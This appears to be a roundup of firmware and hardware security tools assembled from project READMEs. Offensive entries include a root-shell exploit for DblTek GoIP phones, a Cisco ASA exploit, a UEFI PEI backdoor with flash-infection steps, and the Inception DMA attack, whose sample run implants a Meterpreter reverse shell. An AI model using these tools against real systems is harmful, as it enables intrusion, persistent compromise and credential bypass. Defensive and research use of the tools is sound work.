TROMMEL identifies the following indicators related to:
– Secure Shell (SSH) key files
– Secure Socket Layer (SSL) key files
– Internet Protocol (IP) addresses
– Uniform Resource Locator (URL)
– email addresses
– shell scripts
– web server binaries
– configuration files
– database files
– specific binary files (e.g. Dropbear, BusyBox, etc.)
– shared object library files
– web application scripting variables, and
– Android application package (APK) file permissions.
TROMMEL has also integrated vFeed, which allows for further in-depth vulnerability analysis of the identified indicators.
Dependencies:
+ Python-Magic https://pypi.python.org/pypi/python-magic
+ vFeed Database Community(free Edition) https://vfeed.io/pricing/
The vFeed.db (The Correlated Vulnerability and Threat Database) is a detective and preventive security information repository used for gathering vulnerability and mitigation data from scattered internet sources into a unified database.
Notes
* TROMMEL has been tested using Python 2.7 on macOS Sierra and Kali Linux x86_64.
* TROMMEL was written with the intent of helping to identify indicators that may point to vulnerabilities in the firmware of embedded devices.
Usage:
git clone https://github.com/CERTCC-Vulnerability-Analysis/trommel && cd trommel
./trommel.py --help
./trommel.py -p /directory -o output_file
Features:
+ UEFI Firmware Volumes, Capsules, FileSystems, Files, Sections parsing
+ Intel PCH Flash Descriptors
+ Intel ME modules parsing (ME, TXE, etc)
+ Dell PFS (HDR) updates parsing
+ Tiano/EFI, and native LZMA (7z) [de]compression
+ Complete UEFI Firmware volume object hierarchy display
+ Firmware descriptor [re]generation using the parsed input volumes
+ Firmware File Section injection
Supported Vendors
This module has been tested on BIOS/UEFI/firmware updates from the following vendors. Not every update for every product will parse; some may require a priori decompression or extraction from the distribution update mechanism (typically a PE).
– ASRock
– Dell
– Gigabyte
– Intel
– Lenovo
– HP
– MSI
– VMware
– Apple
Requirements
– Python development headers, usually found in the python-dev package.
– The compression/decompression features will use the python headers and gcc.
– pefile is optional, and may be used for additional parsing.
Usage:
git clone https://github.com/theopolis/uefi-firmware-parser && cd uefi-firmware-parser
pip install -r requirements.txt
./bin/uefi-firmware-parser -h
./bin/uefi-firmware-parser --test <your_image_firmware>
python scripts/fv_injector.py -h
python scripts/uefi_guids.py -h
Install with pypi:
sudo pip install uefi_firmware
sudo pip install uefi_firmware --upgrade (for upgrade)
Source: https://github.com/theopolis
The Vulnerability
+ On March 2nd, 2017, Trustwave disclosed a vulnerability that security researchers found in the DblTek GoIP VoIP phone. The vulnerability was a backdoor in the firmware for an account named ‘dbladm’. When a user entered this as their username at a telnet prompt, the system presented a challenge that, when followed by the right response, gave the user a root shell on the system.
+ The problem with such a challenge-response system is that the devices are only as secure as the algorithm for generating the responses, which was reverse engineered from firmware binaries provided by DblTek. Using this algorithm, a root shell can be acquired on ANY DblTek GoIP device.
DblTekGoIPPwn
Linux Dependencies:
+ Mono
Windows Dependencies:
+ Visual Studio
Usage:
git clone https://github.com/JacobMisirian/DblTekGoIPPwn && cd DblTekGoIPPwn
./install.sh
DblTekGoIPPwn --help
DblTekGoIPPwn --send-commands cmds.txt --file list.txt --output results.txt
Source: https://github.com/JacobMisirian
Firmware and research tools for Nordic Semiconductor nRF24LU1+ based USB dongles and breakout boards.
Requirements
+ SDCC (minimum version 3.1.0)
+ GNU Binutils
+ Python
+ PyUSB
+ platformio
Supported Hardware
The following hardware has been tested and is known to work.
– CrazyRadio PA USB dongle
– SparkFun nRF24LU1+ breakout board
– Logitech Unifying dongle (model C-U0007, Nordic Semiconductor based)
Features:
+ Flash over USB
+ Flash a Logitech Unifying dongle
+ Flash a Logitech Unifying dongle back to the original firmware.
+ Flash over SPI using a Teensy
+ Flash the nRF24LU1+
=Installation=
To utilize the full-system image:
* Flash image file under ‘image’ onto an SD-card or
For the standalone application:
* Copy ‘app’ into working directory
* Run ‘mithren.py’
Download and build from source base Debian/Ubuntu:
Install dependencies:
sudo apt-get install sdcc binutils python python-pip
sudo pip install -U pip
sudo pip install -U -I pyusb
sudo pip install -U platformio
git clone https://github.com/wolfmd/mith-ren && cd mith-ren
cd modules/mousejack/
make
To flash the firmware over USB:
sudo make install
To flash the firmware over USB onto a Logitech Unifying dongle:
sudo make logitech_install
To flash the Logitech firmware back onto the dongle:
sudo ./prog/usb-flasher/logitech-usb-restore.py [path-to-firmware.hex]
Build and upload the Teensy flasher:
platformio run --project-dir teensy-flasher --target upload
Flash the nRF24LU1+ over SPI:
sudo make spi_install
For the reconnaissance tools:
cd tools and run them one by one
Finally:
cd ..
cd app
python mithren-frontend.py
python mithrend.py
Source: https://github.com/wolfmd
Note:
* As of now, it is simply a script to automate Firmadyne, which is a tool used for firmware emulation. In case of any issues with the actual emulation, please post them in the Firmadyne issue tracker.
* In case you are on Kali and are facing issues with emulation, it is recommended to use the AttifyOS Pre-Release VM (downloadable from here), or alternatively you could do the above mentioned.
Firmware Analysis Toolkit is built on top of the following existing tools and projects:
1. Firmadyne
2. Binwalk
3. Firmware-Mod-Kit
4. MITMproxy
5. Firmwalker
Download and Setup instructions:
Install Binwalk:
git clone https://github.com/devttys0/binwalk.git
cd binwalk
sudo ./deps.sh
sudo python ./setup.py install
sudo apt-get install python-lzma (for Python 2.x)
sudo -H pip install git+https://github.com/ahupp/python-magic
Setting up Firmadyne:
sudo apt-get install busybox-static fakeroot git kpartx netcat-openbsd nmap python-psycopg2 python3-psycopg2 snmp uml-utilities util-linux vlan qemu-system-arm qemu-system-mips qemu-system-x86 qemu-utils
git clone --recursive https://github.com/firmadyne/firmadyne.git
cd ./firmadyne; ./download.sh
Edit firmadyne.config and make FIRMWARE_DIR point to the current location of the Firmadyne folder.
Setting up FAT:
git clone https://github.com/attify/firmware-analysis-toolkit
mv firmware-analysis-toolkit/fat.py .
mv firmware-analysis-toolkit/reset.sh .
chmod +x fat.py
chmod +x reset.sh
vi fat.py
Here, edit line 9, which is firmadyne_path = '/root/tools/firmadyne', to the correct path on your system.
Setting up Firmware-Mod-Kit:
sudo apt-get install git build-essential zlib1g-dev liblzma-dev python-magic
git clone https://github.com/brianpow/firmware-mod-kit.git
Find the location of binwalk using which binwalk. Modify the file shared-ng.inc to change the value of the variable BINWALK to /usr/local/bin/binwalk (if that is where your binwalk is installed).
Setting up MITMProxy:
pip install mitmproxy or apt-get install mitmproxy
Setting up Firmwalker:
git clone https://github.com/craigz28/firmwalker.git
Run FAT:
python fat.py
Source: https://github.com/attify
What is Platform Security?
Hardware Implementation and Configuration
• Available Security Features
• Correct Configuration of HW Components
• Testing/Demonstration of HW Security Mechanisms
Firmware Implementation and Configuration
• Access Controls on Firmware Interfaces
• Correct Settings of Lock Bits
• Testing/Demonstration of FW Security Mechanisms
chipsec v1.2.5
feature:
+ System Management Mode
* CPU SMM Cache Poisoning / SMM Range Registers (SMRR)
* SMM memory (SMRAM) Lock
+ BIOS Write Protection
+ Direct HW Access for Manual Testing
+ Forensics
* Live system firmware analysis
* Offline system firmware analysis
Latest Change chipsec v1.2.5:
* More generic handling of chipsec_tools
* file extension fix
* Installing chipsec-manual.pdf
* change setup.py to build the driver by default; change the root directory of chipsec; move WARNING.txt to chipsec; remove PKG-INFO
Tested on:
• Fedora LXDE 64bit
• Ubuntu 64bit
• Debian 64bit and 32bit
• Linux UEFI Validation (LUV)
Installing Manually on Linux & Mac OSX Platform:
Clone the chipsec Git repository and install it as a package:
git clone https://github.com/chipsec/chipsec
python setup.py install
sudo chipsec_main
To use CHIPSEC in place without installing it:
python setup.py build_ext -i
sudo python chipsec_main.py
NOTE: Please read chipsec-manual.pdf for detailed installation and configuration instructions.
Source: https://github.com/chipsec
* Lina offset finder
– python2 ./lina-offsets.py asa_lina_XXX.elf
Will automatically generate necessary offsets to port the exploit to other versions of ASA.
Right now, it takes us longer to load a version of ASA firmware and test it, than it does to generate offsets for a specific version.
The only thing the script doesn’t calculate is FIX_EBP, which is usually 0x48 (72) or 0x58 (88). It seems like 8.4(1) and greater use 0x48.
Dependencies:
+ Metasploit Framework
+ Python 2.7.x
+ Python Scapy Modules
+ NASM
Use and Download:
sudo apt-get install nasm
(make sure you have the Metasploit Framework on your system)
git clone https://github.com/RiskSense-Ops/CVE-2016-6366 && cd CVE-2016-6366
nasm shellcode.nasm (assembles the shellcode)
Now you can run the offset finder:
python2 lina-offsets.py Your_asa_lina_XXX.elf
Source: https://github.com/RiskSense-Ops
Main Menu:
* Insecure Web Interface
* Insufficient Authentication/Authorization
[-] Ensure that any access requiring authentication requires strong passwords
[-] Ensure that user roles can be properly segregated in multi-user environments
[-] Implement two-factor authentication where possible
[-] Ensure password recovery mechanisms are secure
[-] Ensure that users have the option to require strong passwords
[-] Ensure that users have the option to force password expiration after a specific period
[-] Ensure that users have the option to change the default username and password
* Insecure Network Services
* Lack of Transport Encryption
* Privacy Concerns
* Insecure Cloud Interface
* Insecure Mobile Interface
* Insufficient Security Configurability
* Insecure Software/Firmware
* Poor Physical Security
[-] Ensure the device is produced with a minimal number of physical external ports (e.g. USB ports)
[-] Ensure the firmware or operating system cannot be accessed via unintended methods such as through an unnecessary USB port
[-] Ensure the product is tamper resistant
[-] Ensure the product has the ability to limit administrative capabilities in some fashion, possibly by only connecting locally for admin functions
[-] Ensure the product has the ability to disable external ports such as USB
Usage and download:
git clone https://github.com/chihebchebbi/Internet-Of-Things-Pentesting-Framework.git heathen && cd heathen
bash Heathen.sh
Source: https://github.com/chihebchebbi
PEI backdoor project includes:
+ PeiBackdoor.py – Python program that allows to infect raw flash images or individual UEFI PEI drivers with the backdoor code.
+ PeiBackdoor_IA32.efi, PeiBackdoor_IA32.pdb – 32-bit PEI backdoor binary compiled with ACTIVE_PLATFORM = IA32.
+ PeiBackdoor_X64.efi, PeiBackdoor_X64.pdb – 64-bit PEI backdoor binary compiled with ACTIVE_PLATFORM = X64.
+ PeiBackdoor.inf – PEI backdoor project configuration for EDK2 build environment.
+ config.h – PEI backdoor build options.
+ payload.c – Put your own PEI stage code into this source file and call it from Payload() function.
+ src/ – Rest of the PEI backdoor code.
PeiBackdoor.py uses the Capstone engine and pefile Python libraries; install them with the pip install capstone pefile command.
Possible applied use cases:
* Edit values of REMAPBASE, REMAPLIMIT and other host controller registers during RAM initialization to perform UMA remap attack on Intel Management Engine RAM.
* Lock TSEGMB host controller register with the junk value to make System Management Mode code vulnerable to DMA attacks.
* Do other evil things that require hijacking of early stage platform initialization code.
To build PeiBackdoor project you need to have a Windows machine with Visual Studio 2008 and EDK2 https://github.com/tianocore/edk2 source code.
Step by step instruction:
1. Run Visual Studio 2008 Command Prompt and cd to EDK2 directory.
2. Execute the Edk2Setup.bat --pull command to configure the build environment and download the required binaries.
3. Execute git clone git://github.com/Cr4sh/PeiBackdoor.git command.
4. Edit Conf/target.txt file and set ACTIVE_PLATFORM property value to the OvmfPkg/OvmfPkgX64.dsc for 64-bit build or to the OvmfPkg/OvmfPkgIa32.dsc for 32-bit build. Also you need to set TARGET_ARCH property value to the X64 for 64-bit build or to the IA32 for 32-bit build.
5. Edit OvmfPkg/OvmfPkgX64.dsc and add PeiBackdoor/PeiBackdoor.inf path at the end of the [components] section.
6. cd PeiBackdoor && build
7. After compilation resulting PE image file will be created at Build/OvmfX64/DEBUG_VS2008x86/X64/PeiBackdoor/PeiBackdoor/OUTPUT/PeiBackdoor.efi for 64-bit build or at Build/OvmfX64/DEBUG_VS2008x86/IA32/PeiBackdoor/PeiBackdoor/OUTPUT/PeiBackdoor.efi for 32-bit build.
Running on real hardware
To run PeiBackdoor.efi on your physical machine you need to obtain image of existing PEI driver:
1. Dump motherboard firmware using hardware SPI programmer.
2. Open dumped flash image in UEFITool and extract PE/TE image of existing PEI driver that you want to infect with PEI backdoor:
...and infect it using PeiBackdoor.py:
1. Infect the extracted PE or TE image with PeiBackdoor_IA32.efi or PeiBackdoor_X64.efi, depending on its architecture: python PeiBackdoor.py -d image.efi -o image_patched.efi -p PeiBackdoor_X64.efi
2. Use UEFITool to replace the original PE image with image_patched.efi, save the modified flash image into a file and write it to the motherboard ROM with the programmer.
Usage and Download from git:
git clone https://github.com/Cr4sh/PeiBackdoor && cd PeiBackdoor
python PeiBackdoor.py -f flash.bin -p PeiBackdoor_IA32.efi -o flash_patched.bin
Source: http://blog.cr4.sh/ | https://github.com/Cr4sh
Roadmap & Changelog v0.4.1-git 29/6/2016:
+ Added some offsets for WIN7 Enterprise x64
Changelog 04/17/2015 v-0.4.1 Stable:
– Merged SLOTSCREAMER interface support
Inception is a physical memory manipulation and hacking tool exploiting PCI-based DMA. The tool can attack over FireWire, Thunderbolt, ExpressCard, PC Card and any other PCI/PCIe HW interfaces.
Inception aims to provide a relatively quick, stable and easy way of performing intrusive and non-intrusive memory hacks against live computers using DMA.
How it works:
– Inception’s modules work as follows: By presenting a Serial Bus Protocol 2 (SBP-2) unit directory to the victim machine over the IEEE1394 FireWire interface, the victim operating system thinks that a SBP-2 device has connected to the FireWire port. Since SBP-2 devices utilize Direct Memory Access (DMA) for fast, large bulk data transfers (e.g., FireWire hard drives and digital camcorders), the victim lowers its shields and enables DMA for the device. The tool now has full read/write access to the lower 4GB of RAM on the victim.
– Once DMA is granted, the tool proceeds to search through available memory pages for signatures at certain offsets in the operating system’s code. Once found, the tool manipulates this code. For instance, in the unlock module, the tool short circuits the operating system’s password authentication module that is triggered if an incorrect password is entered.
– After running that module you should be able to log into the victim machine using any password.
– An analogy for this operation is planting an idea into the memory of the machine; the idea that every password is correct. In other words, the equivalent of a memory inception.
Caveats
OS X > 10.7.2 and Windows > 8.1 disable FireWire DMA when the user has locked the OS, and thus prevent inception. The tool will still work while a user is logged on. However, this is a less probable attack scenario IRL.
In addition, OS X Mavericks > 10.8.2 on Ivy Bridge (>= 2012 Macs) have enabled VT-D, effectively blocking DMA requests and thwarting all inception modules. Look for vtd[0] fault entries in your log/console.
Requirements
Inception requires:
Hardware:
— Attacker machine: Linux or Mac OS X (host / attacker machine) with a FireWire or Thunderbolt interface, or an ExpressCard/PCMCIA expansion port. Linux is currently recommended due to buggy firewire interfaces on OS X
— Victim machine: A FireWire or Thunderbolt interface, or an ExpressCard/PCMCIA expansion port
Software:
— Python 3
— git
— gcc (incl. g++)
— cmake
— pip (for automatic resolution of dependencies)
— libforensic1394
— msgpack
Note that DMA access is limited to the lower 4 GB of RAM (addresses up to 0xffffffff). You may still be able to exploit the target by dumping as much memory as possible and, say, searching for encryption keys.
Key data:
Version: 0.4.0
License: GPL
Author: Carsten Maartmann-Moe (carsten@carmaa.com) AKA ntropy
Twitter: @breaknenter
Site: http://www.breaknenter.org/projects/inception
Source: https://github.com/carmaa/inception
The tool makes use of the libforensic1394 library courtesy of Freddie Witherden under a LGPL license.
Installation
On Debian-based distributions the installation command lines can be summarized as:
sudo apt-get install git cmake g++ python3 python3-pip
On OS X, you can install the tool requirements with homebrew:
brew install git cmake python3
After installing the requirements, download and install libforensic1394:
git clone git://git.freddie.witherden.org/forensic1394.git
cd forensic1394
cmake CMakeLists.txt
sudo make install
cd python
sudo python3 setup.py install
or
wget https://freddie.witherden.org/tools/libforensic1394/releases/libforensic1394-0.2.tar.gz -O - | tar xz
cd libforensic1394-0.2
cmake CMakeLists.txt
make install
cd python
python3 setup.py install
Download and install Inception
git clone git://github.com/carmaa/inception.git
cd inception
./setup.py install
The setup script should be able to install dependencies if you have pip installed.
General usage :
1. Connect the attacker machine (host) and the victim (target) with a FireWire cable
2. Run Inception
Simply type:
incept [module name]
For a more complete and up-to-date description, run:
incept -h
Execution :
skygear$ incept implant --msfpw password --msfopts LHOST=36.16.1.1
[Inception ASCII-art banner]
v.0.4.1 (C) Carsten Maartmann-Moe 2016
Download: http://breaknenter.org/projects/inception | Twitter: @breaknenter
[?] Will potentially write to file. OK? [y/N] y
[!] This module currently only work as a proof-of-concept against Windows 7 SP1 x86. No other OSes, versions or architectures are supported, nor is there any guarantee that they will be supported in the future.
[?] What MSF payload do you want to use? windows/meterpreter/reverse_tcp
[*] Selected options:
[*] LPORT: 4444
[*] LHOST: 172.16.1.1
[*] EXITFUNC: thread
[*] Stage 1: Searcing for injection point
[================================> ] 837 MiB ( 53%)
[*] Signature found at 0x219d118c in page no. 137681
[*] Patching at 0x219d118c
[\] Waiting to ensure stage 1 execution
[*] Restoring memory at initial injection point
[*] Stage 2: Searching for page allocated in stage 1
[=========================> ] 534 MiB ( 42%)
[*] Signature found at 0x1b2d9000 in page no. 111321
[*] Patching at 0x1b2d9000
[*] Patch verified; successful
[*] BRRRRRRRAAAAAWWWWRWRRRMRMRMMRMRMMMMM!!!
For Source & More Detail read here : http://www.breaknenter.org/projects/inception/
Disclaimer from Developers:
Do no evil with this tool. Also, I am a pentester, not a developer. So if you see weird code that bugs your pythonesque purity senses, drop me a note on how I can improve it. Or even better, fork my code, change it and issue a pull request.
Download : inception-0.4.1.zip(2.6 MB) | inception-0.4.1.tar.gz(1.8 MB)
iv-wrt is an intentionally vulnerable router firmware distribution based on OpenWrt.
Feature :
+ Authentication Bypass; Authentication is turned off for the network diagnostics page.
+ Backdoor; A backdoor user account with root privileges has been added.
+ Command Injection; It is possible to inject ash commands into the ping field which exists on <ip-address>/admin/network/diagnostics.
+ Reflected Cross-Site Scripting; On /cgi-bin/luci/;stok=<session-token>/admin/system/packages you can search for a package to determine whether or not it’s installed. Your search string is shown above the results. It is possible to inject scripting into this field.
+ Stored Cross-Site Scripting; It is possible to inject scripting into the hostname of the router. Since the hostname appears in the title of every page in the administration interface, this results in stored XSS for all pages.
+ Cross Site Request Forgery; While a user is logged in to the administration interface, a specially-crafted link from an outside source can cause actions to be executed on the administration interface. The system does not verify that the session token is correct.
Setup :
To start the image you will need qemu-system-mipsel and all of its dependencies. We recommend that you create a TAP device called tap0 and bridge it to your network interface. When the image boots, its LAN ip will be 10.0.0.1.
The driver for e1000 network cards has been built into the image. The following command tells qemu to start the image using the interface tap0 and the e1000 NIC:
qemu-system-mipsel -kernel iv-wrt.elf -nographic -m 256 -net tap,ifname=tap0,script=no,downscript=no -net nic,model=e1000
Download : iv-wrt-master.zip(7.43 MB)
Source : https://github.com/iv-wrt